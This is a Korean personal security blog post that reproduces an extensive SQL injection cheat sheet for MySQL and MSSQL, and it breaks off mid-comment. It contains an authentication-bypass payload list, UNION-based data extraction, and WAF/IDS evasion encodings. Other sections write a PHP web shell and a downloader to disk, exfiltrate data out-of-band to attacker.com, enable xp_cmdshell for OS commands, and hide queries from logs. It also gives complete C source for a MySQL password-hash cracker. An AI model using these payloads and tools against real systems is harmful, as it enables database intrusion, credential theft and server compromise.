'WORK/SECURITY'에 해당되는 글 9건

  1. 2013.01.16 SQL Injection by yangdaegam 2
  2. 2011.08.02 TOOOOOOOOOOOOOLS by yangdaegam
  3. 2011.01.18 Port List by yangdaegam
  4. 2010.08.13 보안정보사이트 by yangdaegam 1
  5. 2010.08.13 WEB Application Security by yangdaegam
  6. 2010.08.13 SQL Injection by yangdaegam 1
  7. 2010.07.13 서비스가 꺼졋을경우 자동으로 키는방법(윈도우편) by yangdaegam
  8. 2010.06.14 Microsft Web Application Strees Tool by yangdaegam
  9. 2010.06.14 네트워크 대역폭 측정(IPerf) by yangdaegam

SQL Injection

WORK/SECURITY 2013. 1. 16. 09:22



SQL Injection이란?

http://en.wikipedia.org/wiki/SQL_injection


정보 주르륵.



Normal SQL Injection (MySQL)

Normal SQL Injection using encapsulated data. (MySQL)

Blind SQL Injection to throw an error to validate that encapsulation isn’t working. The goal here is to throw an error to cause the application to show us that it is not encapsulating quotes correctly. (MySQL)

Blind SQL Injection creating an error using EXEC. (MySQL)

Blind SQL Injection detection (this shouldn’t give us the same result if filtering is in place as we would get if we excluded the AND 1 = 1 part. If it does give us the same result it shows that the application is. (MySQL)

Blind SQL Injection to attempt to locate tablenames by brute force iteration through potential names (you’ll have to rename tablenames until you find a match). (MySQL)

Using the USER_NAME() function in SQL Server to tell us if the user is running as the administrator. (SQL)

Evading escapes with backslashes (this assumes the application comments out a single quote with another single quote and by introducing a backslash before it, it comments out the singlequote that is added by the filter). This type of filter is applied by mySQL’s mysql_real_escape_string() and PERL’s DBD method $dbh→quote(). (MySQL/SQL)

More blind SQL Injection by attempting to create an error using the backslash method seen above. (MySQL/SQL)

Creating errors by calling fake tables. This can help expose vulnerable applications by attempting to create an error by calling tables that are nonexistant (try this with and without the quotes). (MySQL/SQL)

Dumping usernames (assuming there is a username table and quotes are not escaped). (MySQL/SQL)

Enumerating through database table names. By changing the 116 to different numbers you can use logrithmic reduction to find the first char of the database table name. Then iterating through the first 1 in 1, 1 you can eventually get the whole table name. Originally found by Kevin Spett. (SQL)

Finding user supplied tables using the sysObjects table in SQL Server. (SQL)

Bypassing filter evasion using comment tags. (SQL)



===========================================================================================================================

This list can be used by Hackers when testing for SQL injection authentication bypass.A Hacker can use it manually or through burp in order to automate the process.If you have any other suggestions please feel free to leave a comment in order to improve and expand the list.

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

===========================================================================================================================

DB별 값.


http://pentestmonkey.net/category/cheat-sheet/sql-injection

http://www.hakim.ws/2012/07/referencia-para-inyeccion-sql/



이게 제일 조으다.

http://www.websec.ca/kb/sql_injection

    MySQL

    Default Databases

    mysqlRequires root privileges
    information_schemaAvailalble from version 5 and higher

    Testing Injection

    False means the query is invalid (MySQL errors/missing content on website)

    True means the query is valid (content is displayed as usual)

    Given the query SELECT * FROM Table WHERE id = '1';

    'False
    ''True
    "False
    ""True
    \False
    \\True

    Example:
    • SELECT * FROM Articles WHERE id = '1''';
    • SELECT 1 FROM dual WHERE 1 = '1'''''''''''''UNION SELECT '2';

    Note:

    • You can use as many apostrophes and quotations as you want as long as they pair up.
    • It is also possible to continue the statement after the chain of quotes.
    • Quotes escape quotes.

    Comment Out Query

    The following can be used to comment out the rest of the query after your injection:

    #Hash comment
    /*C-style comment
    -- -SQL comment
    ;%00Nullbyte
    `Backtick

    Examples:
    • SELECT * FROM Users WHERE username = '' OR 1=1 -- -' AND password = '';
    • SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3`';

    Note:

    • The backtick can only be used to end a query when used as an alias.

    Testing Version

    • VERSION()
    • @@VERSION
    • @@GLOBAL.VERSION

    Example:
    • True if MySQL version is 5.
    • SELECT * FROM Users WHERE id = '1' AND MID(VERSION(),1,1) = '5';

    Note:

    • Output will contain -nt-log in case the DBMS runs on a Windows based machine.

    Database Credentials

    Tablemysql.user
    Columnsuser, password
    Current Useruser(), current_user(), current_user, system_user(), session_user()

    Examples:
    • SELECT current_user;
    • SELECT CONCAT_WS(0x3A, userpassword) FROM mysql.user WHERE user = 'root'-- (Privileged)

    Database Names

    Tablesinformation_schema.schemata, mysql.db
    Columnsschema_name, db
    Current DBdatabase(), schema()

    Examples:
    • SELECT database();
    • SELECT schema_name FROM information_schema.schemata;
    • SELECT DISTINCT(db) FROM mysql.db;-- (Privileged)

    Server Hostname

    • @@HOSTNAME

    Example:
    • SELECT @@hostname;

    Server MAC Address

    The Universally Unique Identifier is a 128-bit number where the last 12 digits are formed from the interfaces MAC address.

    • UUID()

    Output:
    • aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee;

    Note:

    • May return a 48-bit random string instead of the MAC address on some Operating Systems.

    Tables and Columns

    Determining number of columns

      ORDER BY n+1;

    Note:

    • Keep incrementing the number until you get a False response.


    Example:

      Given the query SELECT username, password, permission FROM Users WHERE id = '1';

      1' ORDER BY 1--+True
      1' ORDER BY 2--+True
      1' ORDER BY 3--+True
      1' ORDER BY 4--+False - Query is only using 3 columns
      -1' UNION SELECT 1,2,3--+True

    Retrieving Tables

    UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10;

    Note:

    • version=9 for MySQL 4
    • version=10 for MySQL 5

    Retrieving Columns

    UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename'

    Retrieving Multiple Tables/Columns at once

    • SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x

    Example:
    • SELECT * FROM Users WHERE id = '-1' UNION SELECT 1, 2, (SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x), 4--+';

    Output:
      [ information_schema ] >CHARACTER_SETS > CHARACTER_SET_NAME
      [ information_schema ] >CHARACTER_SETS > DEFAULT_COLLATE_NAME
      [ information_schema ] >CHARACTER_SETS > DESCRIPTION
      [ information_schema ] >CHARACTER_SETS > MAXLEN
      [ information_schema ] >COLLATIONS > COLLATION_NAME
      [ information_schema ] >COLLATIONS > CHARACTER_SET_NAME
      [ information_schema ] >COLLATIONS > ID
      [ information_schema ] >COLLATIONS > IS_DEFAULT
      [ information_schema ] >COLLATIONS > IS_COMPILED
      						

    • SELECT MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20, table_name, 0x3c62723e, 0x436f6c756d6e3a20, column_name ORDER BY (SELECT version FROM information_schema.tables) SEPARATOR 0x3c62723e),1,1024) FROM information_schema.columns

    Example:
    • SELECT username FROM Users WHERE id = '-1' UNION SELECT MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20, table_name, 0x3c62723e, 0x436f6c756d6e3a20, column_name ORDER BY (SELECT version FROM information_schema.tables) SEPARATOR 0x3c62723e),1,1024) FROM information_schema.columns--+';

    Output:
      Table: talk_revisions
      Column: revid
      
      Table: talk_revisions
      Column: userid
      
      Table: talk_revisions
      Column: user
      
      Table: talk_projects
      Column: priority
      					

    Find Tables from Column Name

    SELECT table_name FROM information_schema.columns WHERE column_name = 'username';Finds the table names for any columns named username.
    SELECT table_name FROM information_schema.columns WHERE column_name LIKE '%user%';Finds the table names for any columns that contain the word user.

    Find Columns from Table Name

    SELECT column_name FROM information_schema.columns WHERE table_name = 'Users';Finds the columns for the Users table.
    SELECT column_name FROM information_schema.columns WHERE table_name LIKE '%user%';Finds the column names for any tables that contain the word user.

    Find out current query

    SELECT info FROM information_schema.processlistAvailable starting from MySQL 5.1.7.

    Avoiding the use of quotations

    SELECT * FROM Users WHERE username = 0x61646D696EHex encoding.
    SELECT * FROM Users WHERE username = CHAR(97, 100, 109, 105, 110)CHAR() Function.

    String Concatenation

    SELECT 'a' 'd' 'mi' 'n';
    SELECT CONCAT('a', 'd', 'm', 'i', 'n');
    SELECT CONCAT_WS('', 'a', 'd', 'm', 'i', 'n');
    SELECT GROUP_CONCAT('a', 'd', 'm', 'i', 'n');

    Note:

    • CONCAT() will return NULL if any of its arguements is NULL. Instead use CONCAT_WS() .
    • The first argument of CONCAT_WS() defines the separator for the rest of its arguments.

    Conditional Statements

    CASE
    IF()
    IFNULL()
    NULLIF()

    Example:
    • SELECT IF(1=1, true, false);
    • SELECT CASE WHEN 1=1 THEN true ELSE false END;

    Timing

    SLEEP()MySQL 5
    BENCHMARK()MySQL 4/5

    Example:
    • ' - (IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1('true')), false)) - '

    Privileges

    File Privileges

    The following queries can help determine the FILE privileges for a given user.

    SELECT file_priv FROM mysql.user WHERE user = 'username';Root privileges requiredMySQL 4/5
    SELECT grantee, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username%';No privileges requiredMySQL 5

    Reading Files

    Files can be read if the user has FILE privileges.

    • LOAD_FILE()

    Example:
    • SELECT LOAD_FILE('/etc/passwd');
    • SELECT LOAD_FILE(0x2F6574632F706173737764);

    Note:

    • File must be located on the server host.
    • The basedirectory for LOAD_FILE() is @@datadir .
    • The file must be readable by the MySQL user.
    • The file size must be less than max_allowed_packet.
    • The default size for @@max_allowed_packet is 1047552 bytes.

    Writing Files

    Files can be created if the user has FILE privileges.

    • INTO OUTFILE/DUMPFILE

    Examples:
    • To write a PHP shell:
    • SELECT '<? system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php';

    • and then access it at:
    • http://localhost/shell.php?c=cat%20/etc/passwd
    • To write a downloader:
    • SELECT '<? fwrite(fopen($_GET[f], \'w\'), file_get_contents($_GET[u])); ?>' INTO OUTFILE '/var/www/get.php'

    • and then access it at:
    • http://localhost/get.php?f=shell.php&u=http://localhost/c99.txt

    Note:

    • Files cannot be overwritten with INTO OUTFILE .
    • INTO OUTFILE must be the last statement in the query.
    • There is no way to encode the pathname, so quotes are required.

    Out Of Band Channeling

    DNS Requests

    SELECT LOAD_FILE(CONCAT('\\\\foo.',(select MID(version(),1,1)),'.attacker.com\\'));

    SMB Requests

    ' OR 1=1 INTO OUTFILE '\\\\attacker\\SMBshare\\output.txt

    Stacked Queries

    Stacked queries are possible with MySQL depending on which driver is being used by the PHP application to communicate with the database.

    The PDO_MYSQL driver supports stacked queries. The MySQLi (Improved Extension) driver also supports stacked queries through the multi_query() function.


    Examples:
    • SELECT * FROM Users WHERE ID=1 AND 1=0; INSERT INTO Users(username, password, priv) VALUES ('BobbyTables', 'kl20da$$','admin');
    • SELECT * FROM Users WHERE ID=1 AND 1=0; SHOW COLUMNS FROM Users;

    MySQL-specific code

    MySQL allows you to specify the version number after the exclamation mark. The syntax within the comment is only executed if the version is greater or equal to the specified version number.


    Examples:
    • UNION SELECT /*!50000 5,null;%00*//*!40000 4,null-- ,*//*!30000 3,null-- x*/0,null--+
    • SELECT 1/*!41320UNION/*!/*!/*!00000SELECT/*!/*!USER/*!(/*!/*!/*!*/);

    Note:

    • The first example returns the version; it uses a UNION with 2 columns.
    • The second example demonstrates how this can be useful for bypassing a WAF/IDS.

    Fuzzing and Obfuscation

    Allowed Intermediary Characters

    The following characters can be used as whitespaces.

    09Horizontal Tab
    0ANew Line
    0BVertical Tab
    0CNew Page
    0DCarriage Return
    A0Non-breaking Space
    20Space

    Example:
    • '%0A%09UNION%0CSELECT%A0NULL%20%23

    Parentheses can also be used to avoid the use of spaces.

    28(
    29)

    Example:
    • UNION(SELECT(column)FROM(table))

    Allowed Intermediary Characters after AND/OR

    20Space
    2B+
    2D-
    7E~
    21!
    40@

    Example:
    • SELECT 1 FROM dual WHERE 1=1 AND-+-+-+-+~~((1))

    Note:

    • dual is a dummy table which can be used for testing.

    Obfuscating with Comments

    Comments can be used to break up the query to trick the WAF/IDS and avoid detection. By using # or -- followed by a newline, we can split the query into separate lines.

    Example:
    • 1'# 
      AND 0-- 
      UNION# I am a comment! 
      SELECT@tmp:=table_name x FROM-- 
      `information_schema`.tables LIMIT 1# 

    URL Encoded the injection would look like:

    • 1'%23%0AAND 0--%0AUNION%23 I am a comment!%0ASELECT@tmp:=table_name x FROM--%0A`information_schema`.tables LIMIT 1%23

    Certain functions can also be obfuscated with comments and whitespaces.

    • VERSION/**/%A0 (/*comment*/)

    Encodings

    Encoding your injection can sometimes be useful for WAF/IDS evasion.

    URL EncodingSELECT %74able_%6eame FROM information_schema.tables;
    Double URL EncodingSELECT %2574able_%256eame FROM information_schema.tables;
    Unicode EncodingSELECT %u0074able_%u6eame FROM information_schema.tables;
    Invalid Hex Encoding (ASP)SELECT %tab%le_%na%me FROM information_schema.tables;

    Avoiding Keywords

    If an IDS/WAF has blocked certain keywords, there are other ways of getting around it without using encodings.

    • information_schema.tables
    Spacesinformation_schema . tables
    Backticks`information_schema`.`tables`
    Specific Code/*!information_schema.tables*/
    Alternative Namesinformation_schema.partitions
    information_schema.statistics
    information_schema.key_column_usage
    information_schema.table_constraints

    Note:

    • The alternate names may depend on a PRIMARY Key being present in the table.

    Operators

    AND &&Logical AND
    =Assign a value (as part of a SET statement, or as part of the SET clause in an UPDATE statement)
    :=Assign a value
    BETWEEN ... AND ...Check whether a value is within a range of values
    BINARYCast a string to a binary string
    &Bitwise AND
    ~Invert bits
    |Bitwise OR
    ^Bitwise XOR
    CASECase operator
    DIVInteger division
    /Division operator
    <=>NULL-safe equal to operator
    =Equal operator
    >=Greater than or equal operator
    >Greater than operator
    IS NOT NULLNOT NULL value test
    IS NOTTest a value against a boolean
    IS NULLNULL value test
    ISTest a value against a boolean
    <<Left shift
    <=Less than or equal operator
    <Less than operator
    LIKESimple pattern matching
    -Minus operator
    % or MODModulo operator
    NOT BETWEEN ... AND ...Check whether a value is not within a range of values
    != <>Not equal operator
    NOT LIKENegation of simple pattern matching
    NOT REGEXPNegation of REGEXP
    NOT !Negates value
    || ORLogical OR
    +Addition operator
    REGEXPPattern matching using regular expressions
    >>Right shift
    RLIKESynonym for REGEXP
    SOUNDS LIKECompare sounds
    *Multiplication operator
    -Change the sign of the argument
    XORLogical XOR

    Constants

    current_user
    null, \N
    true, false

    Password Hashing

    Prior to MySQL 4.1, password hashes computed by the PASSWORD() function are 16 bytes long. Such hashes look like this:

    PASSWORD('mypass')6f8c114b58f2ce9e

    As of MySQL 4.1, the PASSWORD() function has been modified to produce a longer 41-byte hash value:

    PASSWORD('mypass')*6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4

    Password Cracking

    Cain & Abel and John the Ripper are both capable of cracking MySQL 3.x-6.x passwords.

    A Metasploit module for JTR can be found here.

    MySQL < 4.1 Password Cracker

    This tool is a high-speed brute-force password cracker for MySQL hashed passwords. It can break an 8-character password containing any printable ASCII characters in a matter of hours on an ordinary PC.

      /* This program is public domain. Share and enjoy.
      *
      * Example:
      * $ gcc -O2 -fomit-frame-pointer MySQLfast.c -o MySQLfast
      * $ MySQLfast 6294b50f67eda209
      * Hash: 6294b50f67eda209
      * Trying length 3
      * Trying length 4
      * Found pass: barf
      *
      * The MySQL password hash function could be strengthened considerably
      * by:
      * - making two passes over the password
      * - using a bitwise rotate instead of a left shift
      * - causing more arithmetic overflows
      */
      
      #include <stdio.h>
      
      typedef unsigned long u32;
      
      /* Allowable characters in password; 33-126 is printable ascii */
      #define MIN_CHAR 33
      #define MAX_CHAR 126
      
      /* Maximum length of password */
      #define MAX_LEN 12
      
      #define MASK 0x7fffffffL
      
      int crack0(int stop, u32 targ1, u32 targ2, int *pass_ary)
      {
        int i, c;
        u32 d, e, sum, step, diff, div, xor1, xor2, state1, state2;
        u32 newstate1, newstate2, newstate3;
        u32 state1_ary[MAX_LEN-2], state2_ary[MAX_LEN-2];
        u32 xor_ary[MAX_LEN-3], step_ary[MAX_LEN-3];
        i = -1;
        sum = 7;
        state1_ary[0] = 1345345333L;
        state2_ary[0] = 0x12345671L;
      
        while (1) {
          while (i < stop) {
            i++;
            pass_ary[i] = MIN_CHAR;
            step_ary[i] = (state1_ary[i] & 0x3f) + sum;
            xor_ary[i] = step_ary[i]*MIN_CHAR + (state1_ary[i] << 8);
            sum += MIN_CHAR;
            state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];
            state2_ary[i+1] = state2_ary[i]
              + ((state2_ary[i] << 8) ^ state1_ary[i+1]);
          }
      
          state1 = state1_ary[i+1];
          state2 = state2_ary[i+1];
          step = (state1 & 0x3f) + sum;
          xor1 = step*MIN_CHAR + (state1 << 8);
          xor2 = (state2 << 8) ^ state1;
      
          for (c = MIN_CHAR; c <= MAX_CHAR; c++, xor1 += step) {
            newstate2 = state2 + (xor1 ^ xor2);
            newstate1 = state1 ^ xor1;
      
            newstate3 = (targ2 - newstate2) ^ (newstate2 << 8);
            div = (newstate1 & 0x3f) + sum + c;
            diff = ((newstate3 ^ newstate1) - (newstate1 << 8)) & MASK;
            if (diff % div != 0) continue;
            d = diff / div;
            if (d < MIN_CHAR || d > MAX_CHAR) continue;
      
            div = (newstate3 & 0x3f) + sum + c + d;
            diff = ((targ1 ^ newstate3) - (newstate3 << 8)) & MASK;
            if (diff % div != 0) continue;
            e = diff / div;
            if (e < MIN_CHAR || e > MAX_CHAR) continue;
      
            pass_ary[i+1] = c;
            pass_ary[i+2] = d;
            pass_ary[i+3] = e;
            return 1;
          }
      
          while (i >= 0 && pass_ary[i] >= MAX_CHAR) {
            sum -= MAX_CHAR;
            i--;
          }
          if (i < 0) break;
          pass_ary[i]++;
          xor_ary[i] += step_ary[i];
          sum++;
          state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];
          state2_ary[i+1] = state2_ary[i]
            + ((state2_ary[i] << 8) ^ state1_ary[i+1]);
        }
      
        return 0;
      }
      
      void crack(char *hash)
      {
        int i, len;
        u32 targ1, targ2, targ3;
        int pass[MAX_LEN];
      
        if ( sscanf(hash, "%8lx%lx", &targ1, &targ2) != 2 ) {
          printf("Invalid password hash: %s\n", hash);
          return;
        }
        printf("Hash: %08lx%08lx\n", targ1, targ2);
        targ3 = targ2 - targ1;
        targ3 = targ2 - ((targ3 << 8) ^ targ1);
        targ3 = targ2 - ((targ3 << 8) ^ targ1);
        targ3 = targ2 - ((targ3 << 8) ^ targ1);
      
        for (len = 3; len <= MAX_LEN; len++) {
          printf("Trying length %d\n", len);
          if ( crack0(len-4, targ1, targ3, pass) ) {
            printf("Found pass: ");
            for (i = 0; i < len; i++)
              putchar(pass[i]);
            putchar('\n');
            break;
          }
        }
        if (len > MAX_LEN)
          printf("Pass not found\n");
      }
      
      int main(int argc, char *argv[])
      {
        int i;
        if (argc <= 1)
          printf("usage: %s hash\n", argv[0]);
        for (i = 1; i < argc; i++)
          crack(argv[i]);
        return 0;
      }
      				

    MSSQL

    Default Databases

    pubsNot available on MSSQL 2005
    modelAvailable in all versions
    msdbAvailable in all versions
    tempdbAvailable in all versions
    northwindAvailable in all versions
    information_schemaAvailalble from MSSQL 2000 and higher

    Comment Out Query

    The following can be used to comment out the rest of the query after your injection:

    /*C-style comment
    --SQL comment
    ;%00Nullbyte

    Example:
    • SELECT * FROM Users WHERE username = '' OR 1=1 --' AND password = '';
    • SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3/*';

    Testing Version

    • @@VERSION

    Example:
    • True if MSSQL version is 2008.
    • SELECT * FROM Users WHERE id = '1' AND @@VERSION LIKE '%2008%';

    Note:

    • Output will also contain the version of the Windows Operating System.

    Database Credentials

    Database..Tablemaster..syslogins, master..sysprocesses
    Columnsname, loginame
    Current Useruser, system_user, suser_sname(), is_srvrolemember('sysadmin')
    Database CredentialsSELECT user, password FROM master.dbo.sysxlogins

    Example:
    • Return current user:
    • SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID;

    • Check if user is admin:
    • SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1' ELSE '0' END);

    Database Names

    Database.Tablemaster..sysdatabases
    Columnname
    Current DBDB_NAME(i)

    Examples:
    • SELECT DB_NAME(5);
    • SELECT name FROM master..sysdatabases;

    Server Hostname

    @@SERVERNAME
    SERVERPROPERTY()

    Examples:
    • SELECT SERVERPROPERTY('productversion')SERVERPROPERTY('productlevel'),SERVERPROPERTY('edition');

    Note:

    • SERVERPROPERTY() is available from MSSQL 2005 and higher.

    Tables and Columns

    Determining number of columns

      ORDER BY n+1;

    Example:

      Given the query: SELECT username, password, permission FROM Users WHERE id = '1';

      1' ORDER BY 1--True
      1' ORDER BY 2--True
      1' ORDER BY 3--True
      1' ORDER BY 4--False - Query is only using 3 columns
      -1' UNION SELECT 1,2,3--True

    Note:

    • Keep incrementing the number until you get a False response.


    The following can be used to get the columns in the current query.

      GROUP BY / HAVING

    Example:

      Given the query: SELECT username, password, permission FROM Users WHERE id = '1';

      1' HAVING 1=1--Column 'Users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
      1' GROUP BY username HAVING 1=1--Column 'Users.password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
      1' GROUP BY username, password HAVING 1=1--Column 'Users.permission' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
      1' GROUP BY username, password, permission HAVING 1=1--No Error

    Note:

    • No error will be returned once all columns have been included.

    Retrieving Tables

    We can retrieve the tables from two different databases, information_schema.tables or from master..sysobjects.

    UNION SELECT name FROM master..sysobjects WHERE xtype='U'

    Note:

    • Xtype = 'U' is for User-defined tables. You can use 'V' for views.

    Retrieving Columns

    We can retrieve the columns from two different databases, information_schema.columns or masters..syscolumns.

    UNION SELECT name FROM master..syscolumns WHERE id = (SELECT id FROM master..syscolumns WHERE name = 'tablename')

    Retrieving Multiple Tables/Columns at once

    The following 3 queries will create a temporary table/column and insert all the user-defined tables into it. It will then dump the table content and finish by deleting the table.

    • Create Temp Table/Column and Insert Data:
    • AND 1=0; BEGIN DECLARE @xy varchar(8000) SET @xy=':' SELECT @xy=@xy+' '+name FROM sysobjects WHERE xtype='U' AND name>@xy SELECT @xy AS xy INTO TMP_DB END;
    • Dump Content:
    • AND 1=(SELECT TOP 1 SUBSTRING(xy,1,353) FROM TMP_DB);
    • Delete Table:
    • AND 1=0; DROP TABLE TMP_DB;

    An easier method is available starting with MSSQL 2005 and higher. The XML function path() works as a concatenator, allowing the retrieval of all tables with 1 query.

    SELECT table_name %2b ', ' FROM information_schema.tables FOR XML PATH('')SQL Server 2005+

    Note:

    • You can encode your query in hex to "obfuscate" your attack.
    • ' AND 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x44524f50205441424c4520544d505f44423b AS VARCHAR(4000)); EXEC (@S);--

    Avoiding the use of quotations

    SELECT * FROM Users WHERE username = CHAR(97) + CHAR(100) + CHAR(109) + CHAR(105) + CHAR(110)

    String Concatenation

    SELECT CONCAT('a','a','a'); (SQL SERVER 2012)
    SELECT 'a'+'d'+'mi'+'n';

    Conditional Statements

    IF
    CASE

    Example:
    • IF 1=1 SELECT 'true' ELSE SELECT 'false';
    • SELECT CASE WHEN 1=1 THEN true ELSE false END;

    Note:

    • IF cannot be used inside a SELECT statement.

    Timing

    • WAITFOR DELAY 'time_to_pass';
    • WAITFOR TIME 'time_to_execute';

    Example:
    • IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0';

    OPENROWSET Attacks

    SELECT * FROM OPENROWSET('SQLOLEDB', '127.0.0.1';'sa';'p4ssw0rd', 'SET FMTONLY OFF execute master..xp_cmdshell "dir"');

    System Command Execution

    Include an extended stored procedure named xp_cmdshell that can be used to execute operating system commands.

    • EXEC master.dbo.xp_cmdshell 'cmd';

    Starting with version MSSQL 2005 and higher, xp_cmdshell is disabled by default, but can be activated with the following queries:

    EXEC sp_configure 'show advanced options', 1
    EXEC sp_configure reconfigure
    EXEC sp_configure 'xp_cmdshell', 1
    EXEC sp_configure reconfigure

    Alternatively, you can create your own procedure to achieve the same results:

    DECLARE @execmd INT
    EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT
    EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%\system32\cmd.exe /c'

    If the SQL version is higher than 2000, you will have to run additional queries in order the execute the previous command:

    EXEC sp_configure 'show advanced options', 1
    EXEC sp_configure reconfigure
    EXEC sp_configure 'OLE Automation Procedures', 1
    EXEC sp_configure reconfigure

    Example:
    • Checks to see if xp_cmdshell is loaded, if it is, it checks if it is active and then proceeds to run the 'dir' command and inserts the results into TMP_DB:
    • ' IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='TMP_DB') DROP TABLE TMP_DB DECLARE @a varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id (N'[dbo].[xp_cmdshell]') AND OBJECTPROPERTY (id, N'IsExtendedProc') = 1) BEGIN CREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, config_value int, run_value int) INSERT %23xp_cmdshell EXEC master..sp_configure 'xp_cmdshell' IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE config_value=1)BEGIN CREATE TABLE %23Data (dir varchar(8000)) INSERT %23Data EXEC master..xp_cmdshell 'dir' SELECT @a='' SELECT @a=Replace(@a%2B'<br></font><font color="black">'%2Bdir,'<dir>','</font><font color="orange">') FROM %23Data WHERE dir>@a DROP TABLE %23Data END ELSE SELECT @a='xp_cmdshell not enabled' DROP TABLE %23xp_cmdshell END ELSE SELECT @a='xp_cmdshell not found' SELECT @a AS tbl INTO TMP_DB--
    • Dump Content:
    • ' UNION SELECT tbl FROM TMP_DB--
    • Delete Table:
    • ' DROP TABLE TMP_DB--

    SP_PASSWORD (Hiding Query)

    Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure.

    • SP_PASSWORD

    Example:
    • ' AND 1=1--sp_password

    Output:
      -- 'sp_password' was found in the text of this event.
      -- The text has been replaced with this comment for security reasons.
      					

    Stacked Queries

    MSSQL supports stacked queries.

    Example:
    • ' AND 1=0 INSERT INTO ([column1], [column2]) VALUES ('value1', 'value2');

    Fuzzing and Obfuscation

    Allowed Intermediary Characters

    The following characters can be used as whitespaces.

    01Start of Heading
    02Start of Text
    03End of Text
    04End of Transmission
    05Enquiry
    06Acknowledge
    07Bell
    08Backspace
    09Horizontal Tab
    0ANew Line
    0BVertical Tab
    0CNew Page
    0DCarriage Return
    0EShift Out
    0FShift In
    10Data Link Escape
    11Device Control 1
    12Device Control 2
    13Device Control 3
    14Device Control 4
    15Negative Acknowledge
    16Synchronous Idle
    17End of Transmission Block
    18Cancel
    19End of Medium
    1ASubstitute
    1BEscape
    1CFile Separator
    1DGroup Separator
    1ERecord Separator
    1FUnit Separator
    20Space
    25%

    Examples:
    • S%E%L%E%C%T%01column%02FROM%03table;
    • A%%ND 1=%%%%%%%%1;

    Note:

    • The percentage signs in between keywords is only possible on ASP(x) web applications.


    The following characters can be also used to avoid the use of spaces.

    22"
    28(
    29)
    5B[
    5D]

    Example:
    • UNION(SELECT(column)FROM(table));
    • SELECT"table_name"FROM[information_schema].[tables];

    Allowed Intermediary Characters after AND/OR

    01 - 20Range
    21!
    2B+
    2D-
    2E.
    5C\
    7E~

    Example:
    • SELECT 1FROM[table]WHERE\1=\1AND\1=\1;

    Note:

    • The backslash does not seem to work with MSSQL 2000.

    Encodings

    Encoding your injection can sometimes be useful for WAF/IDS evasion.

    URL EncodingSELECT %74able_%6eame FROM information_schema.tables;
    Double URL EncodingSELECT %2574able_%256eame FROM information_schema.tables;
    Unicode EncodingSELECT %u0074able_%u6eame FROM information_schema.tables;
    Invalid Hex Encoding (ASP)SELECT %tab%le_%na%me FROM information_schema.tables;
    Hex Encoding' AND 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x53454c4543542031 AS VARCHAR(4000)); EXEC (@S);--
    HTML Entities (Needs to be verified)%26%2365%3B%26%2378%3B%26%2368%3B%26%2332%3B%26%2349%3B%26%2361%3B%26%2349%3B

    Password Hashing

    Passwords begin with 0x0100, the first for bytes following the 0x are a constant; the next eight bytes are the hash salt and the remaining 80 bytes are two hashes, the first 40 bytes are a case-sensitive hash of the password, while the second 40 bytes are the uppercase version.

    0x0100236A261CE12AB57BA22A7F44CE3B780E52098378B65852892EEE91C0784B911D76BF4EB124550ACABDFD1457

    Password Cracking

    A Metasploit module for JTR can be found here.

    MSSQL 2000 Password Cracker

    This tool is designed to crack Microsoft SQL Server 2000 passwords.

      /////////////////////////////////////////////////////////////////////////////////
      //
      //           SQLCrackCl
      //
      //           This will perform a dictionary attack against the
      //           upper-cased hash for a password. Once this
      //           has been discovered try all case variant to work
      //           out the case sensitive password.
      //
      //           This code was written by David Litchfield to
      //           demonstrate how Microsoft SQL Server 2000
